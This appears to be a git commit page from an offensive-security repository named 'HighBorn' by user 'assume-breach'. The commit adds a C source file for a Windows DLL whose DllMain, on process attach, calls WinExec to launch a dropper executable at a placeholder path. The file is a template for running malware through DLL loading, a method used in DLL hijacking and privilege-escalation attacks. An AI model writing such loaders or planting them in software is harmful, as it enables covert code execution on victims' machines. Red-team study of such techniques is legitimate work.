assume-breach 3 лет назад
Родитель
Сommit
80fc118931
1 измененных файлов с 23 добавлено и 0 удалено
  1. 23 0
      HighBorn/HighBorn.c

+ 23 - 0
HighBorn/HighBorn.c

@@ -0,0 +1,23 @@
+#include <windows.h>
+
+void spwnrce()
+{
+    WinExec("C:\\PATH\\TO\\DROPPER\\dropper.exe",1);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+                     )
+{
+    switch (ul_reason_for_call)
+    {
+    case DLL_PROCESS_ATTACH:
+        spwnrce();
+    case DLL_THREAD_ATTACH:
+    case DLL_THREAD_DETACH:
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return TRUE;
+}